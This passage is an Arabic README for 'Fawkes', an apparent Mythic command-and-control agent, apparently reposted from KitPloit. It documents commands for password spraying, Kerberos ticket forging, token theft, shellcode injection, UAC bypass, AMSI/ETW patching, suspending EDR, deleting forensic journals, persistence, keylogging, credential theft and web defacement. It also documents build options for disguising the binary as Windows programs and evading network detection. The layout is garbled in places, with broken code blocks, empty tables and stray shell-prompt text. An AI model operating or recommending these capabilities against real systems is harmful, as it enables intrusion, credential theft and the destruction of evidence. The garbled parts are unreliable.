shell-config | `shell-config -action <history\|list\|read\|inject\|remove\|clear> [-file <.bashrc>] [-line <cmd>] [-lines <count>]` | قراءة تاريخ القشرة، سرد/قراءة/حقن/إزالة/مسح ملفات تكوين القشرة. Linux/macOS: bashrc/zshrc. Windows: ملفات تعريف PowerShell + تاريخ PSReadLine. T1546.004/T1546.013/T1552.003/T1070.003.
sleep | `sleep [seconds] [jitter] [working_start] [working_end] [working_days]` or `sleep -interval 60 -jitter 30 -jitter_profile normal` | تعيين الفاصل الزمني للاستدعاء، التموج، ساعات العمل، وتوزيع ملف التموج (uniform/normal/exponential). التوزيع الطبيعي يتجمع بالقرب من الفاصل الزمني؛ التوزيع الأسي يحاكي أنماط الاندفاع البشري.
socks | `socks <start\|stop\|stats\|bandwidth> [port] [-bandwidth_kbs N]` | بدء، إيقاف، عرض الإحصائيات، أو تعيين النطاق الترددي لوكيل SOCKS5. يدعم TCP CONNECT و UDP ASSOCIATE (RFC 1928) لترحيل أدوات DNS/UDP عبر الوكيل. تحديد النطاق الترددي لكل اتصال اختياري بـ KB/s. الإحصائيات تظهر الاتصالات النشطة، البايتات المرسلة/المستلمة، التاريخ الحديث.
sort | `sort -path <file> [-reverse true] [-numeric true] [-unique true]` | فرز أسطر الملف. يدعم الأوضاع الأبجدية، العددية، العكسية، والفريدة. عبر المنصات (T1083).
spawn | `spawn -path <exe> [-ppid <pid>] [-blockdlls true]` | **(Windows فقط)** إطلاق عملية أو خيط معلق للحقن. يدعم تزوير PPID (T1134.004) وحظر DLL غير التابعة لـ Microsoft.
spray | `spray -action <kerberos\|ldap\|smb> -server <DC> -domain <DOMAIN> -users <user1\nuser2> [-password <pass>] [-hash <NT hash>] [-delay <ms>] [-jitter <0-100>]` | رش كلمة مرور ضد AD عبر مصادقة Kerberos المسبقة، ربط LDAP، أو مصادقة SMB. SMB يدعم تمرير التجزئة. واعي بالقفل مع تأخير/تموج قابل للتكوين. عبر المنصات (T1110.003, T1550.002).
ssh | `ssh [-action exec\|push\|check\|tunnel-local\|tunnel-remote\|tunnel-dynamic\|tunnel-list\|tunnel-stop] -host <target> -username <user> [-password <pass>] [-key_path <path>] [-command <cmd>] [-local_port <port>] [-remote_host <host>] [-remote_port <port>]` | تنفيذ الأوامر، دفع الملفات، أو إنشاء أنفاق SSH. `check` يتحقق من متطلبات SSH الأساسية (المنفذ، المصادقة، القشرة). tunnel-local (-L)، tunnel-remote (-R)، tunnel-dynamic (-D SOCKS5). عبر المنصات (T1021.004, T1570, T1572).
ssh-agent | `ssh-agent [-action <list\|enum>] [-socket /path/to/agent.sock]` | **(لينكس/macOS فقط)** تعداد مآخذ وكيل SSH وسرد المفاتيح المحملة. يكتشف SSH_AUTH_SOCK، يمسح /tmp/ssh-*، /run/user/*، سلسلة مفاتيح GNOME. يبلغ عن بصمات المفاتيح إلى مخزن بيانات الاعتماد (T1552.004).
ssh-keys | `ssh-keys -action <list\|add\|remove\|read-private\|enumerate\|generate\|find-reachable\|try-keys\|auto-move> [-key <ssh_key>] [-user <username>] [-targets <range>] [-host <ip>] [-username <user>] [-command <cmd>]` | إدارة مفاتيح SSH وأتمتة الحركة الجانبية. قراءة/حقن authorized_keys، قراءة المفاتيح الخاصة، إنشاء أزواج المفاتيح، تعداد تكوين SSH. الحركة الجانبية: find-reachable (مسح الشبكة الفرعية)، try-keys (اختبار المفاتيح)، auto-move (سلسلة مسح→مصادقة→تنفيذ). Windows: جلسات PuTTY/السجل، مفاتيح .ppk، WSL، OpenSSH، تكوين Git SSH. عبر المنصات (T1552.004, T1552.002, T1098.004, T1021.004, T1046).
stat | `stat -path <file_or_dir>` | عرض بيانات وصفية للملف/الدليل: النوع، الحجم، الأذونات، الطوابع الزمنية. تفاصيل خاصة بالمنصة — inode/المالك (Linux/macOS)، سمات الملف (Windows). واعية بالروابط الرمزية عبر Lstat. عبر المنصات (T1083).
strings | `strings -path <file> [-min_length <n>] [-pattern <text>] [-offset <bytes>] [-max_size <bytes>]` | استخراج سلاسل ASCII القابلة للطباعة من الملفات. العثور على نص مضمن، عناوين URL، بيانات اعتماد في الثنائيات. مرشح النمط، التحكم في الحد الأدنى للطول، الإزاحة/الحد الأقصى للحجم. عبر المنصات (T1005).
start-clr | `start-clr [-action execute-assembly -assembly <b64> -arguments <args>]` | **(Windows فقط)** تهيئة CLR v4 أو تنفيذ تجميعات .NET. إجراء `execute-assembly` يصحح AMSI+ETW تلقائيًا ويشغل التجميع في خطوة واحدة (مثل CS execute-assembly). الوضع اليدوي مع -amsi_patch/-etw_patch للتحكم الدقيق.
systemd-persist | `systemd-persist -action <install\|remove\|list> -name <unit> [-exec_start <cmd>] [-timer <calendar>] [-system true]` | **(لينكس فقط)** تثبيت، إزالة، أو سرد ثبات خدمة/مؤقت systemd. نطاق المستخدم أو النظام. MITRE T1543.002.
steal-token | `steal-token -pid <pid> [-action spawn -command <cmd>]` | **(Windows فقط)** سرقة رمز من عملية أخرى: انتحاله، أو إطلاق عملية به (T1134.002).
token-store | `token-store -action <save\|list\|use\|remove\|history> -name <label>` | **(Windows فقط)** خزنة رموز مسماة — حفظ، سرد، استعادة، إزالة، وعرض تاريخ انتقال الهوية. يتيح التبديل السريع بين الهويات المسروقة/المنشأة دون إعادة السرقة (T1134.001).
suspend | `suspend -action <suspend\|resume> -pid <PID>` | تعليق أو استئناف عملية. إيقاف EDR/AV تكتيكي أثناء العمليات الحساسة. Windows: NtSuspendProcess/NtResumeProcess. Linux/macOS: SIGSTOP/SIGCONT. عبر المنصات (T1562.001).
sysinfo | `sysinfo [-action info\|full-profile]` | معلومات شاملة للنظام: إصدار نظام التشغيل، الأجهزة، الذاكرة، وقت التشغيل، المجال، .NET (Windows)، حالة SELinux/SIP. `full-profile` يشغل سلسلة تحديد مواصفات المضيف الآلية المكونة من 5 خطوات (sysinfo → ps → security-info → privesc-check → persist-enum). عبر المنصات (T1082).
sysmon-config | `sysmon-config [-action check\|rules\|events]` | **(Windows فقط)** كشف تثبيت Sysmon واستخراج التكوين — حالة الخدمة/برنامج التشغيل، خوارزمية التجزئة، أعلام الخيارات، حجم بيانات القاعدة، قنوات الأحداث. يكتشف التثبيتات المعاد تسميتها عبر ارتفاع minifilter (T1518.001, T1562.001).
tac | `tac -path <file>` | طباعة أسطر الملف بالترتيب العكسي. مفيد لعرض السجلات من الأحدث إلى الأقدم. عبر المنصات (T1083).
tail | `tail -path <file> [-lines <N>] [-head true] [-bytes <N>]` | قراءة أول أو آخر N أسطر/بايتات من ملف دون نقل المحتوى بالكامل. مخزن مؤقت حلقي لـ tail فعال، بحث عكسي للملفات الكبيرة. عبر المنصات (T1005, T1083).
tcc-check | `tcc-check [-service <filter>]` | **(macOS فقط)** تعداد أذونات TCC (الشفافية، الموافقة، والتحكم). اكتشاف التطبيقات التي لديها كاميرا، ميكروفون، تسجيل الشاشة، وصول كامل للقرص. يجمع حسب الخدمة مع ملخص مسموح به (T1082).
touch | `touch -path <file> [-mkdir true]` | إنشاء ملف فارغ أو تحديث الطوابع الزمنية لملف موجود. إنشاء الدليل الأصلي اختياري. عبر المنصات (T1106).
thread-hijack | `thread-hijack -pid <PID> [-tid <TID>]` | **(Windows, macOS)** حقن الشيل كود عبر اختطاف تنفيذ الخيط — تعليق الخيط الموجود، إعادة توجيه PC/RIP إلى الشيل كود، استئناف. macOS يستخدم واجهات Mach (task_for_pid + thread_get/set_state)، يتطلب root (T1055.003).
threadless-inject | `threadless-inject` | **(Windows فقط)** حقن الشيل كود باستخدام حقن بدون خيوط عن طريق ربط دالة DLL في عملية بعيدة. أكثر خفاءً من الحقن العادي حيث لا ينشئ خيوطًا جديدة.
ticket | `ticket -action forge\|request\|diamond\|renew\|s4u\|pkinit -realm <DOMAIN> -username <user> -key <hex_key> [-key_type aes256\|aes128\|rc4] [-format kirbi\|ccache] [-domain_sid <SID>] [-spn <SPN>] [-server <KDC>] [-impersonate <user>] [-krbtgt_key <hex>] [-target_user <user>] [-ticket <base64>] [-certificate <pem>] [-private_key <pem>]` | تزوير، طلب، تجديد، تفويض، أو مصادقة شهادة تذاكر Kerberos. Forge: تذاكر Golden/Silver (بدون اتصال). Request: Overpass-the-Hash (عبر الإنترنت). Diamond: تبادل AS حقيقي + تعديل التذكرة للتهرب. Renew: تمديد عمر TGT. S4U: التفويض المقيد عبر S4U2Self+S4U2Proxy. PKINIT: مصادقة قائمة على الشهادة من ADCS/شهادات الظل. عبر المنصات (T1558.001, T1558.002, T1550.002, T1134.001, T1649).
tr | `tr -path <file> -from [:lower:] -to [:upper:]` | ترجمة، ضغط، أو حذف الأحرف في محتوى الملف. يدعم فئات الأحرف والنطاقات. عبر المنصات (T1083).
triage | `triage -action <all\|documents\|credentials\|configs\|database\|scripts\|archives\|mail\|recent\|custom\|recon-chain> [-path <dir>] [-hours <n>] [-target <subnet>] [-username <user>] [-password <pass>]` | العثور على ملفات عالية القيمة للتسريب — المستندات، بيانات الاعتماد، التكوينات، قواعد البيانات (.db/.sqlite)، النصوص البرمجية (.py/.sh/.ps1)، الأرشيفات (.zip/.tar/.7z)، ملفات البريد الإلكتروني (.pst/.eml/.mbox)، الملفات المعدلة حديثًا، أو مسح مسار مخصص. **recon-chain**: سلسلة مهام فرعية آلية — فحص المنفذ → تعداد مشاركة SMB → صيد المشاركات → التصنيف المحلي (يتطلب الهدف، اسم المستخدم/كلمة المرور). عبر المنصات (T1083, T1005).
trust | `trust -server <DC> -username <user@domain> -password <pass> [-use_tls]` | تعداد علاقات الثقة في المجال/الغابة عبر LDAP مع طوبولوجيا الغابة، تحليل العبور، قوة التشفير، وتحديد مسار الهجوم. عبر المنصات (T1482).
timestomp | `timestomp -action <get\|copy\|set\|match\|random\|clean-prefetch> -target <file> [-source <file>] [-timestamp <time>]` | تعديل الطوابع الزمنية للملف للاندماج. الحصول، النسخ من ملف آخر، تعيين وقت محدد، مطابقة جيران الدليل (IQR)، أو عشوائي داخل نطاق. `clean-prefetch` يحذف ملفات Prefetch في Windows لملف تنفيذي مسمى. Windows يعدل أيضًا وقت الإنشاء.
tscon | `tscon [-action <list\|hijack\|disconnect\|logoff>] [-session_id <id>]` | **(Windows فقط)** إدارة جلسة RDP — سرد، اختطاف، قطع الاتصال، أو تسجيل الخروج من الجلسات. السيطرة على الجلسة دون بيانات اعتماد (T1563.002).
ts | `ts [-a] [-i PID]` | **(Windows فقط)** سرد الخيوط في العمليات. افتراضيًا يعرض فقط الخيوط القابلة للتنبيه (معلقة/DelayExecution). استخدم -a لجميع الخيوط، -i للتصفية حسب PID (T1057).
uac-bypass | `uac-bypass [-technique fodhelper\|computerdefaults\|sdclt\|eventvwr\|silentcleanup\|cmstp\|dismhost\|wusa] [-command <path>]` | **(Windows فقط)** تجاوز UAC للتصعيد من النزاهة المتوسطة إلى العالية. 8 تقنيات: اختطاف السجل، اختطاف متغير البيئة، إساءة استخدام ملف INF، اختطاف COM CLSID، دليل موثوق مزيف. الافتراضي يطلق رد اتصال مرتفع (T1548.002, T1218.003).
uniq | `uniq -path <file> [-count true] [-duplicate true] [-unique_only true]` | تصفية أو عد الأسطر المتكررة المتتالية في ملف. وضع العد يرتب حسب التكرار. عبر المنصات (T1083).
unlink | `unlink -connection_id <uuid>` | قطع اتصال وكيل P2P مرتبط (TCP أو أنبوب مسمى). عبر المنصات (T1572).
uptime | `uptime` | عرض وقت تشغيل النظام، وقت الإقلاع، ومتوسطات الحمل. عبر المنصات (T1082).
upload | `upload` | رفع ملف إلى الهدف مع نقل ملف مجزأ. يدعم فك الضغط التلقائي لملفات gzip. التحقق من تجزئة SHA256.
usn-jrnl | `usn-jrnl -action query\|recent\|delete [-volume C:]` | **(Windows فقط)** الاستعلام عن أو حذف دفتر يومية تغييرات USN لـ NTFS — يدمر تاريخ عمليات الملف لأغراض مكافحة الطب الشرعي (T1070.004).
vanilla-injection | `vanilla-injection -action <inject\|migrate\|ldpreload> -pid <PID>` | حقن الشيل كود في عملية بعيدة (inject)، ترحيل الوكيل (migrate: حقن + خروج)، أو إطلاق عملية جديدة مع .so LD_PRELOAD (ldpreload: Linux فقط، بدون ptrace، يتجاوز Yama). **Windows:** VirtualAllocEx/WriteProcessMemory/CreateRemoteThread. **Linux (amd64/arm64):** كتابة مباشرة لـ /proc/PID/mem، LD_PRELOAD عبر memfd. T1055.001, T1055.009, T1574.006.
vm-detect | `vm-detect [-action detect\|sandbox]` | كشف بيئة VM/مشرف الظاهرية أو تحليل التهرب من صندوق الرمل. `detect`: OUI MAC، DMI/SMBIOS، أدوات VM، SCSI، علم CPU للمشرف. `sandbox`: تحليل مُسجل — عدد وحدات المعالجة المركزية، RAM، القرص، وقت التشغيل، توقيت النوم، اسم المضيف، عدد العمليات، اسم المستخدم. عبر المنصات (T1497, T1497.001).
vss | `vss -action <list\|create\|delete\|delete-all\|extract\|inhibit-recovery\|shutdown\|reboot> [-volume C:\\] [-id <id>] [-confirm true]` | تقنيات التأثير: إدارة VSS (Windows)، تثبيط الاسترداد (T1490)، إيقاف التشغيل/إعادة التشغيل (T1529، عبر المنصات). الإجراءات الهدامة تتطلب -confirm true. MITRE T1003.003, T1490, T1529.
watch-dir | `watch-dir -path <dir> [-interval 5] [-duration 300] [-depth 3] [-pattern *.docx] [-hash true]` | مراقبة دليل للتغييرات في نظام الملفات — يكتشف الملفات الجديدة والمعدلة والمحذوفة عبر الاستقصاء. يدعم تصفية glob وكشف تجزئة MD5. عبر المنصات (T1083, T1119).
wc | `wc -path <file_or_dir> [-pattern <glob>]` | عد الأسطر والكلمات والأحرف والبايتات في الملفات. وضع الدليل مع تصفية نمط glob والإجماليات. عبر المنصات (T1083).
wdigest | `wdigest -action <status\|enable\|disable>` | **(Windows فقط)** إدارة تخزين كلمات مرور WDigest بنص عادي. التمكين لالتقاط كلمات المرور النصية عند تسجيل الدخول التالي. MITRE T1003.001, T1112.
winrm | `winrm -host <target> -username <user> [-password <pass>] [-hash <NT hash>] -command <cmd> [-shell cmd\|powershell] [-auto-verify]` or `winrm -action check -host <target> [-username <user> -password <pass>]` | تنفيذ الأوامر على مضيفي Windows عن بُعد عبر WinRM مع مصادقة NTLM. يدعم تمرير التجزئة، cmd.exe و PowerShell. `check` يتحقق من متطلبات WinRM الأساسية (المنافذ 5985/5986، المصادقة، القشرة). عبر المنصات (T1021.006, T1550.002).
windows | `windows [-action list\|search] [-filter <string>] [-all]` | **(Windows فقط)** تعداد نوافذ التطبيق المرئية — يُظهر HWND، PID، اسم العملية، فئة النافذة، والعنوان. مرشحات البحث حسب العنوان/العملية/الفئة. MITRE T1010.
who | `who [-all true]` | عرض المستخدمين المسجلين حاليًا والجلسات النشطة. Linux: يحلل utmp. Windows: WTS API. macOS: الأمر who. عبر المنصات (T1033).
whoami | `whoami` | عرض هوية المستخدم الحالية وسياق الأمان. Windows: اسم المستخدم، SID، نوع الرمز، مستوى النزاهة، عضويات المجموعة، الامتيازات. Linux: المستخدم، UID، GID، المجموعات، الإمكانيات الفعالة (مفككة)، سياق SELinux/AppArmor، كشف الحاوية. macOS: المستخدم، UID، GID، المجموعات.
wmi | `wmi -action <execute\|query\|process-list\|os-info\|upload\|exec-staged\|check> [-target <host>] [-command <cmd>] [-query <wql>]` | **(Windows فقط)** تنفيذ استعلامات WMI، إنشاء العمليات، رفع الملفات، والتنفيذ المرحلي عبر COM API. upload: نقل الملفات عبر تخزين certutil/PowerShell. exec-staged: رفع ثم تنفيذ مع تنظيف تلقائي. `check` يتحقق من متطلبات WMI الأساسية (RPC 135، اتصال WMI). MITRE T1047, T1570.
wmi-persist | `wmi-persist -action <install\|remove\|list> -name <id> -trigger <logon\|startup\|interval\|process> -command <exe> [-consumer_type <command\|script>]` | **(Windows فقط)** ثبات اشتراك حدث WMI عبر COM API. يدعم مستهلكي CommandLine و ActiveScript (VBScript/JScript). بدون ملف، يبقى بعد إعادة التشغيل. MITRE T1546.003.
wlan-profiles | `wlan-profiles [-name <SSID>]` | استرداد ملفات تعريف شبكة WiFi المحفوظة وبيانات الاعتماد. Windows: WLAN API، Linux: NetworkManager/wpa_supplicant/iwd، macOS: Keychain. عبر المنصات (T1555).
write-file | `write-file [-action write\|deface] -path <file> -content <text> [-base64 true] [-append true] [-mkdir true] [-confirm DEFACE]` | كتابة المحتوى إلى الملفات، أو تشويه صفحات الويب. `write`: إنشاء/الكتابة فوق/الإلحاق (افتراضي). `deface`: استبدال محتوى الويب برسالة تشويه (T1491، بوابة أمان). عبر المنصات (T1105, T1491).
write-memory | `write-memory <dll_name> <function_name> <start_index> <hex_bytes>` | **(Windows فقط)** كتابة بايتات إلى عنوان دالة DLL.
xattr | `xattr -action <list\|get\|set\|delete> -path <file> [-name <attr>] [-value <data>] [-hex true]` | **(لينكس/macOS فقط)** إدارة سمات الملف الموسعة — سرد، الحصول، تعيين، حذف. مكمل Unix لـ ADS في Windows لإخفاء البيانات (T1564.004).## تعزيز أوامر Forge

يدعم Fawkes تعزيز أوامر [Mythic Forge](https://github.com/MythicAgents/forge)، والذي يوسع ديناميكياً قدرات الوكيل بمجموعات أدوات خارجية. عند تثبيت Forge بجانب Mythic، تظهر أوامر إضافية تلقائياً في واجهة Mythic لاستدعاءات Fawkes — دون الحاجة إلى إعادة بناء الوكيل.

**مجموعات الأدوات المدعومة:**

| المجموعة | النوع | ينفذ عبر | أمثلة |
|------------|------|-------------|----------|
| [SharpCollection](https://github.com/Flangvik/SharpCollection) | تجميعات .NET | `inline-assembly` | Seatbelt, SharpUp, Rubeus, Certify, SharpHound, SharpDPAPI |
| [Sliver Armory](https://github.com/MythicAgents/forge) | ملفات BOF/COFF | `inline-execute` | SA-whoami, SA-adcs-enum, SA-ldapsearch, SA-nanodump |

### الإعداد (تثبيت جديد)

**الخطوة 1: تثبيت Forge**```bash
cd /path/to/Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/forge

الخطوة 2: إضافة Fawkes لدعم نوع الحمولة في Forge

قم بتحرير InstalledServices/forge/payload_type_support.json وأضف إدخال Fawkes إلى مصفوفة JSON:```json { "agent": "fawkes", "bof_command": "inline-execute", "bof_file_parameter_name": "bof_file", "bof_argument_array_parameter_name": "coff_arguments", "bof_entrypoint_parameter_name": "function_name", "inline_assembly_command": "inline-assembly", "inline_assembly_file_parameter_name": "assembly_file", "inline_assembly_argument_parameter_name": "assembly_arguments", "execute_assembly_command": "", "execute_assembly_file_parameter_name": "", "execute_assembly_argument_parameter_name": "", "assembly_default_execution_method": "inline_assembly" }

root@kitploit:~
هذا يربط واجهة المعلمات العامة لـ Forge بأسماء الأوامر والمعلمات المحددة لـ Fawkes. تعيين الحقول:
- `bof_command` → أمر `inline-execute` الخاص بـ Fawkes (تنفيذ BOF/COFF)
- `inline_assembly_command` → أمر `inline-assembly` الخاص بـ Fawkes (تنفيذ التجميع .NET)
- `execute_assembly_command` → فارغ (يستخدم Fawkes `inline-assembly` لجميع عمليات تنفيذ .NET)
- يجب أن تتطابق أسماء المعلمات تمامًا مع ما تحدده `agentfunctions` الخاصة بـ Fawkes في مجموعة المعلمات "Forge"

**الخطوة 3: إعادة البناء وإعادة التشغيل**```bash
sudo ./mythic-cli build forge
sudo ./mythic-cli restart forge
sudo ./mythic-cli restart fawkes

الخطوة 4: تسجيل مصادر الأدوات

افتح واجهة Mythic واستخدم الأمر forge_register (متاح على أي callback) لتسجيل مصادر الأدوات. المصادر الشائعة:

لتسجيل مصدر، قم بتشغيل forge_register مع تعيين commandName إلى اسم المصدر العادي (مثل Rubeus، وليس forge_net_Rubeus) وremove إلى false.

بعد التسجيل، يقوم Forge بتنزيل ثنائيات الأداة وإنشاء أوامر محسّنة (مثل forge_net_Rubeus، forge_bof_nanodump) التي تظهر في قائمة أوامر الـ callback.

الخطوة 5: التحقق

ترى الاستدعاءات الموجودة تلقائياً أوامر Forge — لا حاجة إلى حمولة جديدة. اختبر بتشغيل أداة مسجلة:

  1. قم بتشغيل autopatch أو start-clr أولاً (تصحيح AMSI لأدوات .NET)
  2. حدد أمر Forge (مثل forge_net_Seatbelt)
  3. أدخل الوسائط (مثل -group=system)
  4. نفذ — يترجم Forge الأمر إلى inline-assembly مع ثنائي الأداة المضمن

نصائح الاستخدام

  • بالنسبة لأدوات .NET (SharpCollection)، قم بتشغيل start-clr مع autopatch أولاً لتهيئة CLR وتصحيح AMSI — بدون ذلك، قد يمنع Windows Defender تنفيذ التجميع
  • بالنسبة لأدوات BOF (Sliver Armory)، تأكد من تجميع BOFs لـ x64
  • لا حاجة إلى معاملات بناء خاصة — دعم Forge مدمج في أوامر inline-execute وinline-assembly الخاصة بـ Fawkes عبر مجموعة المعاملات "Forge"
  • تعمل أوامر Forge على الاستدعاءات الموجودة دون إعادة بناء الوكيل
  • عند إصدار أوامر Forge عبر API، قم بتضمين payload_type: "forge" في طفرة createTask — بدون ذلك، يبحث Mythic فقط في نوع الحمولة الخاص بالاستدعاء

تقنيات الحقن

حقن PoolParty

حقن Opus

المتغيرالتقنيةالهدفGo Shellcode
1Ctrl-C Handler Chainعمليات الكونسول فقطلا
4PEB KernelCallbackTableعمليات واجهة المستخدم الرسومية فقطنعم

للحصول على وصف تفصيلي للمتغيرات، راجع تفاصيل تقنيات الحقن.

خيارات البناء

طرق تصدير DLL

عند البناء في وضع shared (DLL) أو windows-shellcode، يتحكم معامل البناء dll_exports في تصديرات DLL المضمنة:

طرق التنفيذ مع التصديرات الكاملة:

تضخيم الثنائي

يدعم Fawkes تضخيم الثنائي الاختياري في وقت البناء. يؤدي هذا إلى تضمين كتلة من البايتات المكررة في الوكيل المجمع، والتي يمكن استخدامها لزيادة حجم الملف أو خفض درجات الإنتروبيا.

معاملان للبناء يتحكمان في هذا:

  • inflate_bytes - البايتات السداسية العشرية للتضمين (مثل 0x90 أو 0x41,0x42)
  • inflate_count - عدد مرات تكرار نمط البايت

يتم تكرار نمط البايت inflate_count مرة، لذا فإن الحجم الإجمالي المضاف هو length(byte_pattern) * inflate_count.

مرجع سريع للحجم:

عند عدم تكوين التضخيم، تتم إضافة بايت واحد فقط من النفقات العامة إلى الثنائي.

تضمين موارد PE (Windows فقط)

تحتوي ثنائيات PE لنظام Windows على موارد بيانات وصفية — معلومات الإصدار والأيقونات وبيانات UAC — التي تظهر في خصائص الملف وإدارة المهام ومستكشف الملفات. لا تحتوي ثنائيات Go الافتراضية على أي من هذه البيانات الوصفية، وهي إشارة كشف قوية لأدوات الأمن والمحللين.

يدعم Fawkes تضمين موارد PE في وقت البناء للانتحال على الثنائيات الشرعية لنظام Windows:

معاملات البناء:

الإعدادات المسبقة (10 ثنائيات Windows شائعة بمعلومات إصدار حقيقية): notepad, svchost, cmd, explorer, msiexec, dllhost, rundll32, conhost, taskhostw, RuntimeBroker

تتجاوز الحقول الفردية القيم المسبقة. عند عدم تعيين أي معاملات لمورد PE، يبقى الثنائي كما هو من إخراج Go الافتراضي.

ميزات Opsec

تتبع القطع الأثرية

يسجل Fawkes تلقائياً القطع الأثرية مع Mythic للأوامر ذات الصلة بـ opsec. تظهر القطع الأثرية في واجهة Mythic تحت علامة التبويب القطع الأثرية، مما يعطي المشغلين صورة واضحة لجميع المؤشرات الجنائية الناتجة أثناء المهمة.

أنواع القطع الأثرية المتعقبة:

الأوامر للقراءة فقط (ls, ps, cat, env, إلخ.) لا تنشئ قطع أثرية.

تكامل مخزن بيانات الاعتماد

تقوم أوامر جمع بيانات الاعتماد تلقائياً بالإبلاغ عن الاكتشافات إلى مخزن بيانات الاعتماد الخاص بـ Mythic، مما يجعلها قابلة للبحث والتصدير من واجهة Mythic.

تتبع ضغطات المفاتيح

يتكامل أمر keylog مع ميزة سجلات المفاتيح الخاصة بـ Mythic. عند إرجاع ضغطات المفاتيح عبر stop أو dump، يتم تحليلها تلقائياً حسب عنوان النافذة وإرسالها إلى متتبع سجلات المفاتيح في Mythic مع إسناد المستخدم. يمكن البحث في سجلات المفاتيح في واجهة Mythic حسب عنوان النافذة أو المستخدم أو محتوى ضغطات المفاتيح.

تتبع الرموز

تسجل أوامرا make-token و steal-token الرموز مع متتبع رموز الاستدعاء الخاص بـ Mythic. يوفر هذا رؤية حول الرموز المرتبطة بكل استدعاء، بما في ذلك هوية المستخدم المنتحل والعملية المصدر. يقوم أمر rev2self تلقائياً بإزالة الرموز المتعقبة عند التخلي عن الانتحال.

التحقق من شهادة TLS

يتحكم في كيفية تحقق الوكيل من شهادات HTTPS عند التواصل مع خادم C2. يتم تكوينه في وقت البناء عبر معامل tls_verify:

الوضعالوصف
noneتخطي جميع عمليات التحقق من TLS (افتراضي، متوافق مع الإصدارات السابقة)
system-caالتحقق من الشهادات مقابل مخزن الثقة لنظام التشغيل
pinned:<sha256>التثبيت على بصمة شهادة محددة (SHA-256 بالنظام الست عشري). يرفض الوكيل الاتصالات إذا لم تتطابق شهادة الخادم.

يمنع تثبيت الشهادة اعتراض وسيط MITM لحركة الوكيل حتى لو كان المهاجم يتحكم في CA موثوقة.

انتحال بصمة TLS (JA3)

ينتج رصة TLS القياسية لـ Go تجزئة JA3 مميزة يمكن لأدوات أمن الشبكة التعرف عليها كحركة مرور غير متصفحية. يستخدم معامل البناء tls_fingerprint مكتبة uTLS لانتحال ClientHello الخاص بـ TLS، مما ينتج بصمة JA3 مطابقة للمتصفح.

مصادقة شهادة العميل mTLS

أضف مصادقة شهادة العميل إلى ملف تعريف HTTP C2. عند التكوين، يقدم الوكيل شهادة العميل أثناء مصافحة TLS، مما يمكن خادم C2 من التحقق من هوية الوكيل. يمنع اعتراض HTTPS السلبي وهجمات MITM للوسيط.

المعاملالوصف
mtls_certشهادة العميل المشفرة بصيغة PEM
mtls_keyمفتاح العميل الخاص المشفر بصيغة PEM

يتم تشفير الشهادة/المفتاح في base64 في وقت البناء، وتشفيرها بـ XOR إذا تم تمكين إخفاء السلسلة، وتخزينها في خزانة التكوين AES-256-GCM في وقت التشغيل. يتحد مع أوضاع التحقق من TLS الحالية وانتحال بصمة JA3.

عناوين URL احتياطية لـ C2

عناوين URL متعددة لاستدعاء C2 مع تجاوز الفشل التلقائي. إذا كان مضيف الاستدعاء الأساسي غير قابل للوصول، ينتقل الوكيل بشفافية عبر عناوين URL الاحتياطية قبل تطبيق التباطؤ.

المعاملالوصف
fallback_hostsمضيفات C2 احتياطية مفصولة بفواصل (مثل http://backup1.example.com,https://backup2.example.com)

نفس المنفذ والتشفير كالأساسي. يتذكر آخر عنوان URL ناجح. يعمل مع خزانة التكوين وإخفاء XOR.

مفتاح البيئة / القيود (Guardrails)

يمنع الوكيل من التنفيذ على الأنظمة غير المصرح بها. يتم تكوينه في وقت البناء — يخرج الوكيل بصمت قبل إجراء أي اتصال بالشبكة إذا فشلت الفحوصات. لا تسجيل، لا قطع أثرية، لا حركة مرور C2.

جميع الأنماط غير حساسة لحالة الأحرف ومثبتة لمطابقة القيمة الكاملة. يمكن دمج مفاتيح متعددة — يجب أن تمر جميعها. أنماط regex غير الصالحة تفشل (يخرج الوكيل). اترك فارغاً لتخطي الفحص.

اشتقاق مفتاح البيئة (env_key_derive): عند تعيينه، يتم تشفير جميع تكوينات C2 الحساسة (مضيف الاستدعاء، UUID، مفتاح التشفير، URIs، إعدادات الوكيل، إلخ.) بتشفير AES-256-GCM في وقت البناء باستخدام مفتاح مشتق من بيئة الهدف. في وقت التشغيل، يعيد الوكيل اشتقاق المفتاح من بيئته الخاصة — إذا لم تتطابق (مضيف/مجال/مستخدم خاطئ)، يفشل فك التشفير ويخرج الوكيل بصمت. هذا أقوى من مطابقة regex لأن قيم التكوين غير موجودة مطلقاً في الثنائي بأي شكل. يتطلب أن تحتوي قيم env_key_* المقابلة على القيم الهدف الدقيقة (وليس أنماط regex). يتكدس مع obfuscate_strings (طبقة XOR تطبق أولاً، ثم AES-GCM).

إخفاء سلسلة C2

قم بتمكين معامل البناء obfuscate_strings لتشفير جميع سلاسل تكوين C2 (مضيف الاستدعاء، URIs، وكيل المستخدم، مفتاح التشفير، UUID) في وقت البناء باستخدام مفتاح عشوائي 32 بايت لكل بناء. يمنع استخراج IOC البسيط عبر strings على الثنائي. يتم فك التشفير في وقت التشغيل. متعدد المنصات.

منع DLLs للعمليات الفرعية

قم بتمكين معامل البناء block_dlls لتطبيق PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON على جميع العمليات الفرعية التي يطلقها الوكيل (أوامر run, powershell). يمنع EDR من حقن DLLs للمراقبة في العمليات المولدة. يستخدم STARTUPINFOEX مع UpdateProcThreadAttribute. Windows فقط.

انتحال PID الأب للعمليات الفرعية

استخدم config -action set -key default_ppid -value <PID> في وقت التشغيل لجعل جميع العمليات الفرعية (run, powershell) تظهر كأطفال لعملية شرعية (مثل explorer.exe). يهزم الكشف عن علاقة الأب-الطفل من قبل EDR. يتحد مع منع DLLs عند تنشيط كليهما. يستخدم UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS). قم بتعطيله بـ config -action set -key default_ppid -value 0. Windows فقط (T1134.004).

التصحيح التلقائي لـ ETW/AMSI

قم بتمكين معامل البناء auto_patch لتصحيح EtwEventWrite و AmsiScanBuffer تلقائياً عند بدء الوكيل. يمنع هذا الكشف القائم على ETW وفحص AMSI قبل حدوث أي نشاط للوكيل — لا حاجة إلى أمر يدوي. Windows فقط (بلا تأثير على Linux/macOS).

الحذف الذاتي

قم بتمكين الحذف التلقائي للثنائي عند بدء التشغيل عبر معامل البناء self_delete. بمجرد بدء تشغيل الوكيل، يزيل ملفه الخاص من القرص — مما يلغي القطعة الأثرية الجنائية الأساسية.

  • Linux/macOS: يستخدم os.Remove() — تستمر العملية الجارية عبر التعيين الداخلي في الذاكرة. يختفي الملف من القرص فوراً.
